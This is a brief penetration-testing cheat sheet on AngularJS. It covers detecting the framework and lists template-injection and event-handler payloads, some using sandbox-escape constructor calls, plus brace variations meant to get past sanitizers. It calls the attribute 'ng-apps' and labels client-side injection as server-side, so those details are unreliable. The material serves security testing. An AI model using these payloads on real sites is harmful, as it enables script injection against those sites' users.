# Angular Pentesting

## &#x20;<a href="#angular-pentesting" id="angular-pentesting"></a>

AngularJS is a web application framework.

### HTML Attributes <a href="#html-attributes" id="html-attributes"></a>

If a website uses AngularJS framework, the nodes have a “ng-apps” attribute. So you can check it in a HTML source code.

```
<div ng-apps>
```

### Server-Side Template Injection (SSTI) <a href="#server-side-template-injection-ssti" id="server-side-template-injection-ssti"></a>

```
{{2*3}}
{{$on.constructor('alert("test")')()}}
{{constructor.constructor('alert("test")')()}}
<input ng-focus=$event.view.alert('test')>

<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
```

It worth testing to bypass sanitizing as below.

```
# Remove one-pair braces
{2*3}

# Remove all braces
2*3

# Add additional braces
{{{2*3}}}
```